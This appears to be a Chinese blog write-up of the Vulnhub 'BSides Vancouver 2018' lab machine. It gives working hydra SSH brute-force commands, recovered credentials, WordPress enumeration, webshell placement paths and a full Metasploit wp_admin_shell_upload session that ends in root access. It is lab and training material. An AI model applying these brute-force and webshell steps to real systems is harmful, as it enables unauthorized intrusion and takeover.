Vulnhub-靶机-BSides Vancouver: 2018 (Workshop)
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现,本次是直接根据靶机目标给出的地址进行测试
目标靶机的下载地址:https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
发现开放了3个端口,分别是21,22,80这3个端口,我们先尝试访问21端口看看
因为上述nmap的扫描结果已经探测出来可以匿名登陆,我直接使用匿名登陆的方式登陆成功并发现目录public,访问该目录看到文件users.txt.bk ,下载下来查看文件发现有可能是用户名,而且根据这个文件的命名格式也可确定是用户名,那么可以根据目标开放了22端口,可以使用ssh尝试登陆这些用户名试试
for user in user@192.168.5.138; done
使用for循环尝试每个用户,发现只有anne是可以通过密码登陆,其他的用户均只能使用密钥登陆,那么我们尝试暴力破解密码试试
hydra -l anne -P /usr/share/wordlists/rockyou.txt -f -e nsr -o bsides.txt -t 4 ssh://192.168.5.138
发现账户名和密码
[22][ssh] host: 192.168.5.138 login: anne password: princess
这是关于hydra的参数解释:http://www.luxinzhi.com/safe/438.html
现在有了账户和密码那么我们就试试账户和密码使用ssh登陆看看
成功登陆,发现权限极大,可以通过sudo直接提权
使用sudo -i即可提权
---------------------------------------------------------------------------------------------------------------------------------------------------------------
另一种思路
访问web页面
尝试暴力猜解目录
dirb http://192.168.5.138
gobuster dir -u http://192.168.5.138 -w /usr/share/dirb/wordlists/common.txt
根据上述暴力破解目录发现的robots.txt文件,访问得到如下结果,这里在刚开始nmap扫描的结果也有体现
得到目录/backup_wordpress 尝试访问得到如下结果:
确认是个WordPress,那么我们使用wpscan来专门扫描一下
发现存在两个用户名john和admin
得到用户名和密码为:john / enigma
登陆到目标web应用直接改主题模板为webshell代码
获得webshell
也可以写入一句话拿shell方法是一样的
msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.5.138
rhost => 192.168.5.138
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup_wordpress
targeturi => /backup_wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username john
username => john
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password enigma
password => enigma
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
拿到权限后,提权跟上面思路一样
常见的WordPress通过插件和主题获取webshell的路径
http://192.168.5.138/backup_wordpress/wp-content/plugins/akismet/akismet.php
http://192.168.5.138/backup_wordpress/wp-content/themes/twentysixteen/archive.php
http://192.168.5.138/backup_wordpress/wp-content/themes/twentysixteen/template-parts/content.php
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?